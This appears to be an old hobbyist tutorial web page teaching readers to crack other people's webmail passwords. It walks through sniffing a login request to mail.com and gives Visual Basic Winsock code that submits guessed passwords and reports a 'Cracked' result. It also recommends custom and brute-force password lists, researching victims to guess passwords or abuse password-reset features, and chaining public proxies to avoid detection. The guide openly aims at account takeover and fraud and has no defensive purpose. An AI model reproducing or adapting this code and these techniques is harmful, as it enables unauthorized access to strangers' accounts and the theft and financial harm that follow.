Make your own free website on Tripod.com
PickPocket: The Common Password Cracker
By: Christopher da Vinci <davinci@usa.com>

Navigation:
Legal Mumblejumble | Introduction | Where to Start | Packet Sniffing 101 | Programming 101 | Proxies | Cracking Techniques | Summary




Legal Mumblejumble
   Before I start ranting about the skills, tools, and knowledge it takes to be a common password cracker. It's important to remember that cracking is against every online services TOS, Term(s) Of Service, and charges could be pressed against anyone involved. It's also extremely important for you to realize that I, Christopher da Vinci, am in NO way responsible for your actions. If charges are pressed you may not accuse, Christopher da Vinci, family members, or anyone else who reads this tutorial. Now with all the legal "stuff" out of the way, enjoy.
Back to Top


Introduction
   Yes, I am a password cracker. Not the most glamorous lifestyle but it will on the other hand "cure what ills ya". I've traveled down basicly every path to hacking. Nowadays I pretty much stay close to home and code crackers for others but from time to time I get my hands dirty. Password crackers impress me for one reason, you never know when they're coming. Everything could be fine and the next second your account won't login and your credit card is maxed out. Not every cracker is a bad person but alot of them are after the high scores; system access, pin numbers, and social security numbers. This tutorial isn't really for that kind of person this is for the common password cracker, the email cracker. Though cracking pin numbers and all that is fun but you can't expect to start at the top, can you?
Back to Top


Where to Start
   First, get yourself a good PACKET SNIFFER. This is an important tool to have when trying to find out how the login works. Personally I use CommView Packet Monitor v3.1 by TamoSoft Inc., it cost around $100, but that's where software cracking comes into play. Packet sniffers allow you to view everything being sent from your computer to another network but it also shows everything being sent from that network to your computer. Sometimes, on lonely nights, I just sit and watch the packets fly across my screen, god I'm pathetic. Now that you've all laughed at me lets move on...

   Secondly, learn to PROGRAM. Yes, THIS MEANS YOU! Stop crying man it's going to be okay. I've been programming for about ten years give or take. Since you're probably not an advanced programmer, PUT THE HTML BOOK AWAY, I suggest starting out with something simple like Visual Basic or even Delphi. You need programming skills, just small ones, to make simple programs that will run a PASSWORD LIST (more on this later), through a login via WINSOCK (more on this later).

   Thirdly, READ EVERYTHING! Get a well rounded understanding of how CGI, PHP, ASP, JSP, and LOGIN'S work. Sometimes when your cracker isn't doing it's job correctly you have to make corrections that only having this knowledge will fix. It will also give you an advantage over the other crackers out there. When two crackers go after the same account the faster more knowledgeable one always will win.

   Fourthly, make notepad your close and personal friend. You will be using this amazing fantastic piece of software to write all your PASSWORD LISTS. Password lists contain, you guessed it, a list of passwords. I usally make a custom password list based on the account I'm trying to crack but many people use the biggest list they can 'find' and just run it over and over, these people will never have the skills you will.

   Finally, get use to the dark! "I boogie, I like the night life."
Back to Top


Packet Sniffing 101
   First, load a webpage, e.g. www.mail.com, then minimize the browser window and open your packet sniffer.

   Secondly, start the sniffer, in CommView it's the button with the PLAY icon.

   Thirdly, go back to the browser window and login. Once you're logged in then go back to the packet sniffer. Press the stop button and look through the packets.

   Look for the packet that resembles this:
POST /scripts/common/proxy.main HTTP/1.1 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
Referer: http://www.mail.com/ 
Accept-Language: en-us 
Content-Type: application/x-www-form-urlencoded 
Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461;) 
Host: www.mail.com 
Content-Length: 98 
Connection: Keep-Alive 
Cache-Control: no-cache 
Cookie: loginName=username@email.com 

action=login&show_frame=Enter&mail_language=us&login=username@email.com&password=letmein&x=143&y=18
   POST is the method of the form, the 'half' url is the suffix and the HOST is the prefix. The longer url at the very bottom is the sub-suffix. Then by placing them in order; prefix/suffix?sub-suffix, will make the full url.
e.g. www.mail.com/scripts/common/proxy.main?action=login&show_frame=Enter&mail_language=us&login=username@email.com&password=letmein&x=143&y=18

   This may look a little strange at frist but if you place the above url, replacing username@email.com with your email and letmein with your password, it will log you right in. So now you know the full path to logging in, which will allow you to crack.
Back to Top


Programming 101
   Now I'm not going to go into phenomenal detail you should really read a book or online tutorial on programming. I'm just gonna give a vague overall description of programming a cracker. I mentioned, earlier, WINSOCK (Windows Sockets). This is for all you Visual Basic programmers out there, the only reason I'm sticking to VB terminology is because that's the language choice for newbies. Briefly I'm going to talk on the bells and whistles of a cracker. Listbox for the passwords to be loaded into, more advanced programmers will just read the file without listboxes. Textbox for the account you want to crack and may even a statusbar so the user knows whats going on. Okay back to winsock, you basicly put the host as host in preferences and the port to 80 (HTTP Port). Now go back to the form and double click the winsock icon that you placed on the form. This opens up the coding area of winsock. Inside the 'connect' function you would put something similar to this:
Dim Str As String
    Str = "GET /scripts/common/proxy.main?action=login&show_frame=Enter&mail_language=us&login=" & text1.text & _
"&password=" & text2.text & "&x=143&y=18" HTTP/1.1" & vbCrLf
    Str = Str & "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*" & vbCrLf
    Str = Str & "Accept-Language: en-us" & vbCrLf
    Str = Str & "Content-Type: application/x-www-form-urlencoded" & vbCrLf
    Str = Str & "Accept-Encoding: gzip, deflate" & vbCrLf
    Str = Str & "Host: www.mail.com" & vbCrLf
    Str = Str & "Connection: Keep-Alive" & vbCrLf
    Str = Str & "Cache-Control: no-cache" & vbCrLf & vbCrLf
Socket.SendData Str
Where text1.text is the textbox for the username and text2.text is the textbox for the password.

Then go to the 'data arrival' function and you may code something like this:
Dim Data As String
Socket.GetData Data

If InStr(1, Data, "<title>Mail.com</title>") Then
    MsgBox "Wrong"
    Exit Sub
ElseIf InStr(1, Data, "Title: 302 Moved") Then
    MsgBox "Cracked: " & text1.text & " - " & text2.text
    Exit Sub
End If
In each 'instr' you're looking for a KEYWORD that appears if the login is incorrect or correct then once it finds it, tell you the results via msgbox. For finding keywords login with a correct username and password while packet sniffing then do the same with a wrong username and password.
Back to Top


Proxies
   Proxies are basicly the authority to act for another and that's exactly what they do. Proxies mask, hide, your IP (Internet Protocol) Address. You can find thousands of websites that offer public proxies, updated every hour or day, that just basicly means that these proxies can be used by anyone at anytime. Proxies are a crackers best friend. They can literary save your ass when push comes to shove. I'm sure you have been wondering how crackers don't get busted? Proxies are the answer. When companies log ip's they will just be tracing a proxy which wont lead back to you. Alot of crackers use multiple proxies, one connects to another and so on. Depening on the bandwidth of the proxy and the connection type can increase or decrease your cracking. I suggest you look deeper into this topic if your serious about becoming a cracker.
Back to Top


Cracking Techniques
   There are only three main techniques that come to mind when I think of password crackers; manual, info, and brute. In Programming 101, above, that was part of my source code to a Mail.com manual cracker. Which means you basicly 'guess' the password, one password at a time. I, personally, refer to manual crackers as 'snipers' due to the "one shot, one kill" approach they bring to cracking. Info cracking is for those that have no life, like myself. I love, with a passion, info cracking. Info crackers take time to research their victim, get to know them personaly from a far, then use that information to 'guess' their password or use the "forgot password" service most companies provide. Brute crackers better known as Brute Forcers load the biggest, ugliest, ungodliest password list they can find, or make, and run it for days until they have successfully gained access. Now if I'm planning on taking down a large number of accounts at anygiven time then I'm all for brute forcing but otherwise it's to freaking sloppy for me, personally.
Back to Top


Summary
   Well folks I hope you enjoyed the textfile. Check out my page at www.cracker.host.sk for other pieces of work by me. I'm out of here.
Back to Top